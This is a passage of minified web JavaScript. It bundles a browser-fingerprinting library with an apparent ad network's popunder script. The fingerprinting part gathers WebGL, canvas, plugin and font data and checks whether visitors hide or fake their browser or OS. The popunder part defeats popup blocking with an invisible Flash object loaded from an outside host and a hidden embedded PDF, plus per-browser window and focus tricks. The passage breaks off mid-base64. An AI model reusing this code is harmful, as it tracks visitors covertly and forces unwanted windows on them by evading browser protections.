b(a.getParameter(a.STENCIL_BITS));b(a.getParameter(a.VENDOR));b(a.getParameter(a.VERSION));a.getShaderPrecisionFormat&&(b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.HIGH_FLOAT).precision),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.HIGH_FLOAT).rangeMin),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.HIGH_FLOAT).rangeMax),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.MEDIUM_FLOAT).precision),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.MEDIUM_FLOAT).rangeMin),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER, a.MEDIUM_FLOAT).rangeMax),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.LOW_FLOAT).precision),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.LOW_FLOAT).rangeMin),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.LOW_FLOAT).rangeMax),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.HIGH_FLOAT).precision),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.HIGH_FLOAT).rangeMin),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.HIGH_FLOAT).rangeMax),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.MEDIUM_FLOAT).precision), b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.MEDIUM_FLOAT).rangeMin),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.MEDIUM_FLOAT).rangeMax),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.LOW_FLOAT).precision),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.LOW_FLOAT).rangeMin),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.LOW_FLOAT).rangeMax),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.HIGH_INT).precision),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.HIGH_INT).rangeMin),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER, a.HIGH_INT).rangeMax),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.MEDIUM_INT).precision),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.MEDIUM_INT).rangeMin),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.MEDIUM_INT).rangeMax),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.LOW_INT).precision),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.LOW_INT).rangeMin),b(a.getShaderPrecisionFormat(a.VERTEX_SHADER,a.LOW_INT).rangeMax),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.HIGH_INT).precision),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER, a.HIGH_INT).rangeMin),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.HIGH_INT).rangeMax),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.MEDIUM_INT).precision),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.MEDIUM_INT).rangeMin),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.MEDIUM_INT).rangeMax),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.LOW_INT).precision),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.LOW_INT).rangeMin),b(a.getShaderPrecisionFormat(a.FRAGMENT_SHADER,a.LOW_INT).rangeMax)); return d.join("~")},v:function(){var b=document.createElement("div");b.innerHTML="&nbsp;";b.className="adsbox";var c=!1;try{document.body.appendChild(b),c=0===document.getElementsByClassName("adsbox")[0].offsetHeight,document.body.removeChild(b)}catch(a){c=!1}return c},C:function(){if("undefined"!==typeof navigator.languages)try{if(navigator.languages[0].substr(0,2)!==navigator.language.substr(0,2))return!0}catch(b){return!0}return!1},D:function(){var b=navigator.userAgent.toLowerCase(),c=navigator.oscpu, a=navigator.platform.toLowerCase(),b=0<=b.indexOf("windows phone")?6:0<=b.indexOf("win")?1:0<=b.indexOf("android")?3:0<=b.indexOf("linux")?5:0<=b.indexOf("iphone")||0<=b.indexOf("ipad")?4:0<=b.indexOf("mac")?2:0;return("ontouchstart"in window||0<navigator.maxTouchPoints||0<navigator.msMaxTouchPoints)&&6!==b&&3!==b&&4!==b&&0!==b||"undefined"!==typeof c&&(c=c.toLowerCase(),6!==b&&1!==b&&0<=c.indexOf("win")||3!==b&&5!==b&&0<=c.indexOf("linux")||4!==b&&2!==b&&0<=c.indexOf("mac")||0!==b&&0<=c.indexOf("mac")&& 0===c.indexOf("linux")&&0===c.indexOf("win"))?!0:6!==b&&1!==b&&0<=a.indexOf("win")||3!==b&&5!==b&&(0<=a.indexOf("linux")||0<=a.indexOf("android")||0<=a.indexOf("pike"))||4!==b&&2!==b&&(0<=a.indexOf("mac")||0<=a.indexOf("ipad")||0<=a.indexOf("ipod")||0<=a.indexOf("iphone"))||0!==b&&0<=a.indexOf("mac")&&!a.indexOf("linux")&&!a.indexOf("win")?!0:6!==b&&1!==b&&"undefined"===typeof navigator.plugins?!0:!1},B:function(){var b=navigator.userAgent.toLowerCase(),c=navigator.productSub,b=0<=b.indexOf("firefox")? 2:0<=b.indexOf("opera")||0<=b.indexOf("opr")?4:0<=b.indexOf("chrome")?1:0<=b.indexOf("safari")?5:0<=b.indexOf("trident")?3:0;if((1===b||5===b||4===b)&&"20030107"!==c)return!0;c=eval.toString().length;if(37===c&&5!==b&&2!==b&&0!==b||39===c&&3!==b&&0!==b||33===c&&1!==b&&4!==b&&0!==b)return!0;if(0!==b&&2!==b){try{throw"a";}catch(a){try{a.toSource()}catch(d){return!1}}return!0}return!1},g:function(){var b=document.createElement("canvas");return!(!b.getContext||!b.getContext("2d"))},S:function(){if(!y.g())return!1; var b=document.createElement("canvas"),c;try{c=b.getContext&&(b.getContext("webgl")||b.getContext("experimental-webgl"))}catch(a){c=!1}return!!window.WebGLRenderingContext&&!!c},R:function(){return"Microsoft Internet Explorer"===navigator.appName||"Netscape"===navigator.appName&&/Trident/.test(navigator.userAgent)?!0:!1},H:function(){var b=document.createElement("canvas"),c=null;try{c=b.getContext("webgl")||b.getContext("experimental-webgl")}catch(a){}c||(c=null);return c}},z={$:function(b){var c= [],a=b.a.exclude;a.UserAgent||z.ea(c);a.Language||z.T(c);a.ColorDepth||z.m(c);a.PixelRatio||z.W(c);a.ScreenResolution||z.aa(c,b);a.AvailableScreenResolution||z.j(c,b);a.TimezoneOffset||z.ca(c);a.SessionStorage||z.ba(c);a.SessionStorage||z.U(c);a.IndexedDB||z.P(c);a.AddBehavior||z.i(c);a.OpenDatabase||z.V(c);a.CpuClass||z.o(c);a.Platform||z.X(c);a.DoNotTrack||z.s(c);a.Plugins||z.Y(c,b);a.Canvas||z.l(c,b);a.WebGL||z.fa(c);a.AdBlock||z.h(c);a.HasLiedLanguages||z.K(c);a.HasLiedResolution||z.M(c);a.HasLiedOs|| z.L(c);a.HasLiedBrowser||z.J(c);a.TouchSupport||z.da(c);a.JsFonts||z.u(c,b);return c},ea:function(b){var c=navigator.userAgent.replace(/[^a-z]/ig,"");b.push(c)},T:function(b){b.push(navigator.language||navigator.userLanguage||navigator.browserLanguage||"")},m:function(b){b.push(screen.colorDepth||-1)},W:function(b){b.push(window.devicePixelRatio||"")},aa:function(b,c){var a;a=c.a.detectScreenOrientation?screen.height>screen.width?[screen.height,screen.width]:[screen.width,screen.height]:[screen.width, screen.height];"undefined"!==typeof a&&b.push(a)},j:function(b,c){var a;screen.availWidth&&screen.availHeight&&(a=c.a.detectScreenOrientation?screen.availHeight>screen.availWidth?[screen.availHeight,screen.availWidth]:[screen.availWidth,screen.availHeight]:[screen.availHeight,screen.availWidth]);"undefined"!==typeof a&&b.push(a)},ca:function(b){b.push((new Date).getTimezoneOffset())},ba:function(b){y.O()&&b.push(1)},U:function(b){y.N()&&b.push(1)},P:function(b){window.indexedDB&&b.push(1)},i:function(b){document.body&& document.body.addBehavior&&b.push(1)},V:function(b){window.openDatabase&&b.push(1)},o:function(b){b.push(navigator.cpuClass||"unknown")},X:function(b){b.push(navigator.platform||"unknown")},s:function(b){b.push(navigator.doNotTrack||navigator.msDoNotTrack||window.doNotTrack||"unknown")},l:function(b,c){if(y.g()){var a=y.w(c);b.push(a)}},fa:function(b){if(y.S()){var c=y.I();b.push(c)}},h:function(b){var c=y.v();b.push(c)},K:function(b){b.push(y.C())},M:function(b){b.push(!!(screen.width<screen.availWidth|| screen.height<screen.availHeight))},L:function(b){b.push(y.D())},J:function(b){var c=y.B();b.push(c)},da:function(b){var c=y.G();b.push(c)},u:function(b,c){var a=y.A(c);b.push(a)},Y:function(b,c){if(y.R()){if(!c.a.exclude.IEPlugins){var a=y.F(c);b.push(a)}}else a=y.f(c),b.push(a)}}; u.prototype={get:function(b){if("function"!==typeof b)return A(this)[0];A(this,b)},map:function(b,c,a){var d=[];if(null==b)return d;if(this.c&&b.map===this.c)return b.map(c,a);B(this,b,function(b,f,p){d[d.length]=c.call(a,b,f,p)});return d}};function B(b,c,a){if(null!==c)if(b.b&&c.forEach===b.b)c.forEach(a,void 0);else if(c.length===+c.length){b=0;for(var d=c.length;b<d&&a.call(void 0,c[b],b,c)!=={};b++);}else for(d in c)if(c.hasOwnProperty(d)&&a.call(void 0,c[d],d,c)==={})break} function A(b,c){var a=z.$(b),d=[];B(b,a,function(a){"undefined"!==typeof a.join&&(a=a.join(";"));d.push(a)});var n=m(d.join("~~~"));if("function"!==typeof c)return[n,a];c(n,a);return null}u.VERSION="2.0.0-dev";u.Features=z;u.Extractors=y;u.FP2Options=q;u.create=function(b){return new u(b)};window.Fingerprint2=u;(function(){function Uc(){var a;if(a=!Mb)a:{try{if(ab()&&ja(window.location.href)==ja(window.top.location.href)&&ja(m.referrer)==ja(window.location.href)){a=!0;break a}}catch(Cd){}a=!1}if(a)q(p.tc,void 0);else if(function(){var a;a="_"+Nb("kdsjflksdhflsdkhljshgljretadmaven_pop"+Ca);f[a]?a=!1:(f[a]=1,a=!0);return a}()){var b=function(a){this.id=a};b.prototype=new g;b.a=function(a){a?q(p.ba,void 0):q(p.Oa,void 0)};b.prototype.G=function(a,b,c){var d=this.U();a=c?a(b,d,c):a(b,d);try{a&&this.B(a)&&this.ab()&& (a.opener=null)}catch(e){}return a};b.prototype.f=function(a,c,d,e){var f=this.B(a);f&&this.ya();b.a(f);g.prototype.f.apply(this,arguments)};var c={Wb:function(a,b,c,d){return Vc(a,b,c,d)},a:function(){try{if(f.document.location.href==f.top.location.href||f.document.domain==f.top.document.domain)return!0}catch(a){}var b;a:{if(l.chrome())try{var c=ja(f.location.ancestorOrigins[f.location.ancestorOrigins.length-1]),d=ja(f.document.referrer);if(c==d){b=!0;break a}}catch(a){}b=!1}return b},$c:function(a){return a|| null},Lb:function(){var a;if(f.document.location!=f.top.location)try{a=f.top.location.href}catch(b){a=f.document.referrer}else a=f.location.href;return a}},d=function(a){this.id=a||0};d.prototype=new b;d.a=function(){var a=new z;a.a(r.Pa.id);return a};d.prototype.Ja=function(){return l.P()||l.K()&&l.C()?1:g.prototype.Ja.apply(this)};M.o(bb,function(){try{if(A&&1>A.length&&J&&0<J.length){var a=B.ka(Ta),b=y.b();if(b.Fa(a,y.j))if(b.Y(),a=B.ka(Ta),y.l(a)){var c=function(){b.fa(!1);n.F("mouseout",c,!0, a)};n.o("mouseout",c,!0,a);b.fa(!0)}else b.fa(!1)}}catch(d){q(p.m,"cords cse excluded:"+d)}});d.prototype.C=function(){return Ob&&f.admvn_pfrm_ref?f.admvn_pfrm_ref:g.prototype.C.apply(this)};d.prototype.w=function(a){var b;d.a().b(this.id)||(a==Q.lb?b=r.ta:(a=R[Pb])&&a.P()?b=a:b=r.ta);return b};d.prototype.b=function(){var a=g.prototype.b.apply(this);a.push(cb);return a};d.prototype.l=function(){return!0};d.prototype.N=function(a){return a&&!0===a[db+g.s]?!0:!1};var e=function(a){this.id=a||0};e.prototype= new d;e.prototype.Tb=function(a){var b=eb(a);return this.B(b)?(this.f(b,a),this.vd(fb)&&ca.Oc(this,b),b):null};a=function(a){this.id=a};a.prototype=new d;a.prototype.v=function(a,b,c,d){a=this.G(a,b);this.B(a)&&this.f(a,b,c,d)};var k=function(a){this.id=a};k.prototype=new e;k.prototype.v=function(a,b){var d=c.Lb(),e=this.Tb("about:blank");this.B(e)&&c.Wb(e,window.top,d,b)};k.prototype.f=function(a,b,c,e){d.prototype.f.apply(this,arguments);window.name=this.j.J};var h=l.s(),P=l.chrome(),x=l.l(),Qb= P&&(h||52<=l.a(v.V)),qa=P&&56==l.a(v.V),Na=P&&57==l.a(v.V),L=[0,0],Rb=x&&(51<=l.a(v.Ka)||l.s()&&47<=l.a(v.Ka)),F=function(){var a;try{a=Notification&&"default"==Notification.permission}catch(b){a=!1}return a},F=P&&!h&&58<=l.a(v.V)&&F(),Ua=P&&!h&&60==l.a(v.V),D=P&&!h&&61<=l.a(v.V),T=function(){var a="iframe object canvas embed input button".split(" ");a.push("a");return a.join(", ")},W=function(a){var b=0;Qb&&(b=1,h&&P&&(a=[1,1,9999,9999]));return"toolbar=0,directories=0,scrollbars=1,location="+b+ ",statusbar="+b+",menubar=0,resizable=1,width="+a[1]+",height="+a[0]+",left="+a[3]+",top="+a[2]},da=function(a,b){d.prototype.f.apply(a,b)},aa=function(a,b,c){window[O]=function(){c.va(a,b,c.Ub,c.ra)};window.admvpuLoaded=function(){c.Ha=!0}},ia=function(){M.o(bb,function(a){try{y.b().id===r.Qa.id&&(L=(a||window.event).detail)}catch(b){q(p.m,"popunder cords:"+b)}})};if(!l.c()&&(P||x||l.b()||l.C())){var O="admvpu",ma=function(){function a(c){b.appendChild(Sb(m.createElement("param"),c))}var b=Sb(m.createElement("object"), {type:"application/x-shockwave-flash",id:O,name:O,data:"//s3-us-west-2.amazonaws.com/amcdn/admvpopunder.swf"});a({name:"wmode",value:"transparent"});a({name:"menu",value:"false"});a({name:"allowscriptaccess",value:"always"});a({name:"allowfullscreen",value:"true"});a({name:"autoplay",value:"true"});b.setAttribute("style",B.Da(window.screen.availWidth,window.screen.availHeight));n.ea(function(){f.document.body.appendChild(b);b.focus()})},va=function(){var a=m.getElementById(O);if(y.a().id==r.Qa.id&& 0===y.A.s()[0]){Z(a);var b=B.ka(L),c;(c=a||m.getElementById(O))&&c.setAttribute("style",B.Da(window.screen.availWidth,window.screen.availHeight));A&&0<A.length&&!y.C(b)?Z(a):A&&1>A.length&&J&&0<J.length&&y.l(b)&&Z(a)}},Z=function(a){if(a=a||m.getElementById(O))a=a.style,a.width=0,a.height=0,a.visibility="hidden"},G=function(a){this.id=a;this.Ha=!1;this.qa=P&&l.N();this.Ub;this.ra};G.prototype=new d;G.prototype.ab=function(){return!1};G.prototype.v=function(a,b,c,d){this.Ub=c;this.ra=d;aa(a,b,this); if(this.qa&&!this.Ha)return r.W.v.apply(this,arguments);if(!this.qa)return this.Ra.apply(this,arguments)};G.prototype.va=function(a,b,c){this.Ra.apply(this,arguments)};G.prototype.Ra=function(a,b,c,d){var e=ra(f);a=Rb?this.G(a,"about:blank"):this.G(a,l.b()&&11==l.a(v.aa)?"/robots.txt":b,W(e));this.B(a)&&this.f(a,b,c,d)};var wa={input:1,option:1,textarea:1,button:1};G.prototype.f=function(a,b,c,d){var e=this,k=arguments;if(P){var h=B.ka(L);h&&wa[h.tagName.toLowerCase()]&&h.focus();da(e,k)}else if(x)if(Rb){var h= ra(f),g=a.open(b,e.U(),W(h));C(function(){a.focus();a.close();k[0]=g;da(e,k)},100)}else{var m=window.window.open("about:blank");m.focus();m.close();C(function(){try{m=window.window.open("about:blank"),m.focus(),m.close(),da(e,k)}catch(a){}},1)}else l.b()?11==l.a(v.aa)?(a.blur(),f.focus(),f.document.focus(),f.event&&f.event.srcElement&&f.event.srcElement.focus(),C(function(){a.location.href=b;da(e,k)},100)):C(function(){a.blur();a.opener.window.focus();f.self.window.focus();f.focus();da(e,k)},100): l.C()&&(a.blur(),f.focus(),f.name||(f.name=f.location.host.replace(/[-.]/g,"")),window.open("",f.name),window.focus(),h=ra(f),a.resizeTo(h[1],h[0]),a.moveTo(h[2],h[3]),da(e,k));a.blur();a.opener&&a.opener.window.focus();f.self.window.focus();f.focus()};G.prototype.c=function(a){return a&&this.qa&&this.Ha&&(a=a.target)&&a.id!=O?!1:!0};G.prototype.Y=function(){g.prototype.Y.apply(this,arguments);Z()};G.prototype.a=function(){if(!this.qa)return g.prototype.a.apply(this,arguments);this.H||(ia(),aa(eb, "",this),ma(),gb(va,100),this.H=function(){});return this.H};G.prototype.R=function(){return!1};G.prototype.D=function(){return this.qa&&this.Ha?!1:!0};var H=function(a){this.id=a;this.ma=null};H.prototype=new G;H.a=function(a){var b=m.createElement("div");b.setAttribute("style","visibility:hidden;width:0px;height:0px;opacity:0;position:absolute;top:100%;left:0;pointer-events:none;overflow:hidden;");var c=m.createElement("object");c.id="padmvpu_ppdf";c.setAttribute("data",a);b.appendChild(c);return b}; H.prototype.v=function(a,b,c,d){this.ma=b;return G.prototype.Ra.call(this,a,"about:blank",c,d)};H.prototype.na=function(){return"data:application/pdf;base64,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YXRlRGF0ZT4yMDE2LTA1LTI2VDEzOjU0OjM4LTA3OjAwPC94bXA6Q3JlYXRlRGF0ZT4KICAgICAgICAgPHhtcDpNZXRhZGF0YURhdGU+MjAxNi0wNi0xNlQxMTowMzo1OS0wNzowMDwveG1wOk1ldGFkYXRhRGF0ZT4KICAgICAgICAgPHhtcDpDcmVhdG9yVG9vbD5BZG9iZSBBY3JvYmF0IFBybyBEQyAxNS4xNi4yMDAzOTwveG1wOkNyZWF0b3JUb29sPgogICAgICAgICA8ZGM6Zm9ybWF0PmFwcGxpY2F0aW9uL3BkZjwvZGM6Zm9ybWF0PgogICAgICAgICA8eG1wTU06RG9jdW1lbnRJRD51dWlkOjk5MjZhNjk4LWY2YzMtNDZjOS1iMjMxLWFmNDFhMDIwMGUxMjwveG1wTU06RG9jdW1lbnRJRD4KICAgICAgICAgPHhtcE1NOkluc3RhbmNlSUQ+dXVpZDpmOWNmZGJlZC1kMTQxLTRmYjQtYWMwYi1mODlmMWNmYjk1NGU8L3htcE1NOkluc3RhbmNlSUQ+CiAgICAgICAgIDxwZGY6UHJvZHVjZXI+QWRvYmUgQWNyb2JhdCBQcm8gREMgMTUuMTYuMjAwMzk8L3BkZjpQcm9kdWNlcj4KICAgICAgPC9yZGY6RGVzY3JpcHRpb24+CiAgIDwvcmRmOlJERj4KPC94OnhtcG1ldGE+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAKPD94cGFja2V0IGVuZD0idyI/Pg0KZW5kc3RyZWFtDWVuZG9iag00IDAgb2JqDTw8L0ZpbHRlci9GbGF0ZURlY2